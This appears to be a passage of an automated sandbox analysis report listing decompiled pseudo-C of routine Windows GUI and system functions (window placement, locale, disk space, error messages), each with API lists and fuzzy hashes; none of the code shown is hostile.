                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                            • API String ID: 3245196872-1565342463
                                            • Opcode ID: b990ef021fa0b5457c38f029631ac75c56cfe6e564d9fb59a71fe9fb32abe913
                                            • Instruction ID: e3c3d2c21918b1c9d7ba24886270618edd7c9390c60c389b78156950101bc3bb
                                            • Opcode Fuzzy Hash: b990ef021fa0b5457c38f029631ac75c56cfe6e564d9fb59a71fe9fb32abe913
                                            • Instruction Fuzzy Hash: 8641A172D00A59AFDB60DEE8CD85FDEB3ECDF84340F0505A5A958EB142D6B49E84CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00975F74, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00975F74(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E0096ECA8(_t43);
			}










                                            0x00975f77
                                            0x00975f7a
                                            0x00975f8a
                                            0x00975fb9
                                            0x00975f8c
                                            0x00975f8c
                                            0x00975fa0
                                            0x00975fab
                                            0x00975fac
                                            0x00975fad
                                            0x00975fae
                                            0x00975fae
                                            0x00975fd1
                                            0x00975fe1
                                            0x00975fe5
                                            0x00975fe9
                                            0x00975ff4
                                            0x00975ff4
                                            0x00975fe5
                                            0x00975ffc
                                            0x00976003
                                            0x0097600d
                                            0x00976018
                                            0x00976028

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                            • String ID: ,
                                            • API String ID: 2266315723-3772416878
                                            • Opcode ID: 55c5fda27ce81dc7e113369782df961cace78e5959bcdc08335bdb09bc6e60dc
                                            • Instruction ID: 82f423c7194515965d76a433c848d7afa110758980b5cb8c4361b9334dc5e706
                                            • Opcode Fuzzy Hash: 55c5fda27ce81dc7e113369782df961cace78e5959bcdc08335bdb09bc6e60dc
                                            • Instruction Fuzzy Hash: 2C1190B2504601AFCB41DF6CC885F9B77E8AF89310F044928FD58DB346DB75D9048BA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009756F4, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E009756F4(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E00975F68(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E00975F68(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0096EFF4(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E0096ECA8(_t52);
						return E00943328(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                            0x009756fd
                                            0x009756ff
                                            0x00975701
                                            0x00975706
                                            0x00975721
                                            0x0097572a
                                            0x00975758
                                            0x00975758
                                            0x0097575b
                                            0x00975761
                                            0x00975767
                                            0x0097576c
                                            0x00975771
                                            0x00975773
                                            0x00975775
                                            0x00975787
                                            0x00975791
                                            0x0097579c
                                            0x0097579d
                                            0x0097579e
                                            0x0097579f
                                            0x009757ab
                                            0x009757ab
                                            0x009757b0
                                            0x009757b2
                                            0x00000000
                                            0x009757bd
                                            0x00975733
                                            0x00975738
                                            0x0097573a
                                            0x00000000
                                            0x00000000
                                            0x00975751
                                            0x00000000
                                            0x00975715
                                            0x00975715
                                            0x0097571b
                                            0x009757c8
                                            0x009757c8
                                            0x00000000
                                            0x0097571b

                                            APIs
                                            • IsIconic.USER32 ref: 00975733
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00975751
                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00975787
                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 009757AB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$Placement$Iconic
                                            • String ID: ,
                                            • API String ID: 568898626-3772416878
                                            • Opcode ID: 306deeda5e5383de9d1293f2809a12e48f961cc1a85e9a9fc2d9e0f8e7f8d6bb
                                            • Instruction ID: c015388b081deef1a6e9890be59f4bff9055aca0be2c3ab4e50a16cbe95af71b
                                            • Opcode Fuzzy Hash: 306deeda5e5383de9d1293f2809a12e48f961cc1a85e9a9fc2d9e0f8e7f8d6bb
                                            • Instruction Fuzzy Hash: 9D215372600604EBCF54DF68C8C0E9A77ACAF49310F158465FE18DF206D6B1DD04CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096549C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E0096549C(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x99c929 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E0096540C( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x99c904; // 0x96549c
				 *0x99c904 = E0096529C(1, _t19, _t21, __edi, _t23);
				return  *0x99c904(_t23, _t19);
			}










                                            0x009654a4
                                            0x009654a7
                                            0x009654b1
                                            0x009654db
                                            0x009654ec
                                            0x009654ff
                                            0x009654ee
                                            0x009654f3
                                            0x009654f3
                                            0x00000000
                                            0x00965509
                                            0x00000000
                                            0x009654dd
                                            0x009654b8
                                            0x009654c5
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressClassInfoProc
                                            • String ID: MonitorFromWindow
                                            • API String ID: 2840977943-2842599566
                                            • Opcode ID: e26122941fb95926a12694a06a01d4a58956d3bd0760bbeeb810337db138e271
                                            • Instruction ID: 8c1b187ff4b093b90eb01eb10340e5b62d4ea218599772deecda6e56b24fee25
                                            • Opcode Fuzzy Hash: e26122941fb95926a12694a06a01d4a58956d3bd0760bbeeb810337db138e271
                                            • Instruction Fuzzy Hash: 1301F4B150591C6BD700EB989C85EFF735DDF86340F124452F81197212DB28EE01D3B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096A484, Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E0096A484(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x96a501);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00969EE4(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E00969AE4(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E00944470(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x96a508);
				return E00943FB0( &_v8);
			}









                                            0x0096a487
                                            0x0096a48b
                                            0x0096a48f
                                            0x0096a490
                                            0x0096a495
                                            0x0096a498
                                            0x0096a49d
                                            0x0096a4a7
                                            0x0096a4a9
                                            0x0096a4ab
                                            0x0096a4b7
                                            0x0096a4c5
                                            0x0096a4ce
                                            0x0096a4d7
                                            0x0096a4e6
                                            0x0096a4e6
                                            0x0096a4ed
                                            0x0096a4f0
                                            0x0096a4f3
                                            0x0096a500

                                            APIs
                                              • Part of subcall function 00969EE4: WinHelpA.USER32 ref: 00969EF3
                                            • GetTickCount.KERNEL32 ref: 0096A4A2
                                            • Sleep.KERNEL32(00000000,00000000,0096A501,?,?,00000000,00000000,?,0096A47A), ref: 0096A4AB
                                            • GetTickCount.KERNEL32 ref: 0096A4B0
                                            • WinHelpA.USER32 ref: 0096A4E6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CountHelpTick$Sleep
                                            • String ID:
                                            • API String ID: 2438605093-0
                                            • Opcode ID: 3a0b6b661d33b326690b0aa98857fd017a1da2e17dce830cb61749fae6c22f39
                                            • Instruction ID: eedf944dc27a35b78fd4944b430f731257b3a577f875e030819627730de2f9ca
                                            • Opcode Fuzzy Hash: 3a0b6b661d33b326690b0aa98857fd017a1da2e17dce830cb61749fae6c22f39
                                            • Instruction Fuzzy Hash: E9016DB0700204AFE711EBB8CC56F5EB6ECEB8AB04F518462F500E7192DB75AE059966
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00974E40, Relevance: 4.6, APIs: 3, Instructions: 63windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00974E40(intOrPtr* __eax, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _t25;
				intOrPtr* _t31;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E00974D90(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x99b0ac; // 0x99cbb8
					_t9 =  *_t31 + 0x44; // 0x0
					if(_t37 ==  *_t9 || E00985CA8(_t37) == 0) {
						goto L8;
					} else {
						_t25 = SetActiveWindow(_v8);
						if(_t25 == 0) {
							goto L8;
						}
					}
				}
				return _t25;
			}








                                            0x00974e46
                                            0x00974e49
                                            0x00974e5b
                                            0x00974eb9
                                            0x00974ec9
                                            0x00974ed8
                                            0x00000000
                                            0x00974edf
                                            0x00974ece
                                            0x00974ed6
                                            0x00000000
                                            0x00000000
                                            0x00974e8a
                                            0x00974e8a
                                            0x00974e91
                                            0x00974e94
                                            0x00000000
                                            0x00974ea3
                                            0x00974eb0
                                            0x00974eb7
                                            0x00000000
                                            0x00000000
                                            0x00974eb7
                                            0x00974e94
                                            0x00974ee6

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ActiveCaptureIconicWindow
                                            • String ID:
                                            • API String ID: 2069602625-0
                                            • Opcode ID: 1904086062bbc50d002e9801cdd3446d4143432f27697685ef7f7c123ed5405e
                                            • Instruction ID: 57a179fca90040314f5731d113e3f7b29208361935b9125c5203ba3f646ce4a9
                                            • Opcode Fuzzy Hash: 1904086062bbc50d002e9801cdd3446d4143432f27697685ef7f7c123ed5405e
                                            • Instruction Fuzzy Hash: E2116A33700205DBDB20DBA9E985E69B3E8BF46320B2580B6E408CB353EB30ED409790
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00960800, Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00960800(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x96089c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E009607AC(_t22);
				} else {
					E00944220( &_v264, 0x100,  &_v260);
					E0094B544(_v264, 1);
					E00943964();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(0x9608a3);
				return E00943FB0( &_v264);
			}









                                            0x0096080c
                                            0x00960814
                                            0x00960815
                                            0x0096081a
                                            0x0096081d
                                            0x00960825
                                            0x00960829
                                            0x0096087e
                                            0x0096084f
                                            0x00960860
                                            0x00960872
                                            0x00960877
                                            0x00960877
                                            0x00960885
                                            0x00960888
                                            0x0096088b
                                            0x0096089b

                                            APIs
                                            • GetLastError.KERNEL32(00000000,0096089C), ref: 00960820
                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0096089C), ref: 00960846
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorFormatLastMessage
                                            • String ID:
                                            • API String ID: 3479602957-0
                                            • Opcode ID: 552caa5992b9930714000d25bccdb02341cb500ee032b72b45886050f7aa3823
                                            • Instruction ID: f41d0aa402f46e8f3cc6b6f74ee654ca10a638322474066998ff45711731f3a3
                                            • Opcode Fuzzy Hash: 552caa5992b9930714000d25bccdb02341cb500ee032b72b45886050f7aa3823
                                            • Instruction Fuzzy Hash: AE01A2B02043095FE721EBB49CD3FEAB3ACEBD8704F5044B1B64497181EAF1AD808A55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094C330, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 46%
                                            			E0094C330(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x94c394);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E00944220( &_v16, 7,  &_v11);
				_push(_v16);
				E00948138(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(0x94c39b);
				return E00943FB0( &_v16);
			}








                                            0x0094c330
                                            0x0094c339
                                            0x0094c33e
                                            0x0094c33f
                                            0x0094c344
                                            0x0094c347
                                            0x0094c356
                                            0x0094c366
                                            0x0094c36e
                                            0x0094c377
                                            0x0094c380
                                            0x0094c383
                                            0x0094c386
                                            0x0094c393

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0094C394), ref: 0094C356
                                            • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0094C394), ref: 0094C36F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 66544d5598ad3c0de69521d9a29fdab15ac7b721dacac8a1b51ac3888094b6ae
                                            • Instruction ID: d678b7c968085e0d0c3e52d27b9e2029814f70c56c745ec7ebbc34178cf53997
                                            • Opcode Fuzzy Hash: 66544d5598ad3c0de69521d9a29fdab15ac7b721dacac8a1b51ac3888094b6ae
                                            • Instruction Fuzzy Hash: 3FF090B1E087487FEB04EFE1DC52E9EB3AAEBC9714F40C4B5B51096681EAB866048750
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00968B24, Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 55%
                                            			E00968B24() {
				struct HINSTANCE__* _t5;
				intOrPtr _t9;
				intOrPtr _t12;

				_push(_t12);
				_push(0x968b69);
				_push( *[fs:eax]);
				 *[fs:eax] = _t12;
				 *0x99cad0 =  *0x99cad0 + 1;
				if( *0x99cad0 == 0) {
					if( *0x99a968 != 0) {
						_t5 =  *0x99a968; // 0x0
						FreeLibrary(_t5);
					}
					E00943FB0(0x99a964);
				}
				_pop(_t9);
				 *[fs:eax] = _t9;
				_push(0x968b70);
				return 0;
			}






                                            0x00968b29
                                            0x00968b2a
                                            0x00968b2f
                                            0x00968b32
                                            0x00968b35
                                            0x00968b3b
                                            0x00968b44
                                            0x00968b46
                                            0x00968b4c
                                            0x00968b4c
                                            0x00968b56
                                            0x00968b56
                                            0x00968b5d
                                            0x00968b60
                                            0x00968b63
                                            0x00968b68

                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,00000000,00968B69), ref: 00968B4C
                                            • UnregisterDeviceNotification.USER32 ref: 00968B56
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: DeviceFreeLibraryNotificationUnregister
                                            • String ID:
                                            • API String ID: 404752700-0
                                            • Opcode ID: 1519877fda38b567460746069a94ea77cea21a8afe496959f759aa2578051467
                                            • Instruction ID: 8bde3bd64c064b68cab21b72b6474b9bdef97c864e4f4e83a419257625f85fc1
                                            • Opcode Fuzzy Hash: 1519877fda38b567460746069a94ea77cea21a8afe496959f759aa2578051467
                                            • Instruction Fuzzy Hash: 1DE086F02183049FE7165F789C12A2277ACF785704B824862F90082550CA759845D5A6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00948554, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00948554(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E00944DC8(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E00944DC8(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

















                                            0x0094855b
                                            0x00948560
                                            0x00948562
                                            0x00948562
                                            0x00948575
                                            0x00948584
                                            0x00948587
                                            0x00948594
                                            0x00948597
                                            0x0094859c
                                            0x0094859f
                                            0x009485a1
                                            0x009485ae
                                            0x009485b1
                                            0x009485b6
                                            0x009485b9
                                            0x009485bb
                                            0x009485c4

                                            APIs
                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00948575
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: DiskFreeSpace
                                            • String ID:
                                            • API String ID: 1705453755-0
                                            • Opcode ID: a8d94dca8ef206ede16776fe50966212be0521973f10cbf92afc5ca4282f0d3c
                                            • Instruction ID: 6f952cead9c53bf0643e5f87dcfff73c0c8d7e19feae561b4e777208a3131a70
                                            • Opcode Fuzzy Hash: a8d94dca8ef206ede16776fe50966212be0521973f10cbf92afc5ca4282f0d3c
                                            • Instruction Fuzzy Hash: 2511CCB5E00209AF9B44CF99C881DAFB7F9EFC9700B14C569A509E7254E631AA018BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00968354, Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E00968354(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L009466DC();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x96838e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E00943328(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}








                                            0x0096835d
                                            0x00968360
                                            0x00968362
                                            0x00968368
                                            0x009683ac
                                            0x009683b0
                                            0x009683b1
                                            0x009683b5
                                            0x009683b8
                                            0x009683b9
                                            0x009683be
                                            0x00000000
                                            0x009683be
                                            0x0096836d
                                            0x00968372
                                            0x00968375
                                            0x0096837f
                                            0x00968386
                                            0x00968389
                                            0x00000000

                                            APIs
                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 009683B9
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: NtdllProc_Window
                                            • String ID:
                                            • API String ID: 4255912815-0
                                            • Opcode ID: 429b3c22c1a437f21a630fdc902cdf28b41b069670c5cd1cfd9fcdfeef818556
                                            • Instruction ID: 78da9f71e9e8e215f0ca322416b538abc1db11cd7cc7c8b5b13d854a3ad5fa69
                                            • Opcode Fuzzy Hash: 429b3c22c1a437f21a630fdc902cdf28b41b069670c5cd1cfd9fcdfeef818556
                                            • Instruction Fuzzy Hash: CCF096B6604218AF9700DF9AD881C5AB7ECEB4972035144A6FD08D7741D631AD008B70
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00960D90, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00960D90(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}











                                            0x00960d96
                                            0x00960d99
                                            0x00960d9c
                                            0x00960da0
                                            0x00960da5
                                            0x00960dab
                                            0x00960dac
                                            0x00960db6
                                            0x00960dc9
                                            0x00960dd2
                                            0x00960dda
                                            0x00960ddd
                                            0x00960ddd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00960db8
                                            0x00960db8
                                            0x00960dbb
                                            0x00960dbd
                                            0x00960dc0
                                            0x00960dc3
                                            0x00960dc3
                                            0x00000000
                                            0x00960db8
                                            0x00960de4

                                            APIs
                                            • GetSystemInfo.KERNEL32(?), ref: 00960DA0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoSystem
                                            • String ID:
                                            • API String ID: 31276548-0
                                            • Opcode ID: 3c32ec7074d2ac36a25bcdb240cbef4feff1a60114a6be2d7dd4c0aae80d1b06
                                            • Instruction ID: a619defc1a06e76099d69703a594682f8b63380eaa872f6728e094fde0557b81
                                            • Opcode Fuzzy Hash: 3c32ec7074d2ac36a25bcdb240cbef4feff1a60114a6be2d7dd4c0aae80d1b06
                                            • Instruction Fuzzy Hash: 32F062B5A0120D9FCB14DFD8C4E88DDBBB8FB96301B514399D404D7282EB70B594C781
                                            Uniqueness

                                            Uniqueness Score: -1.00%

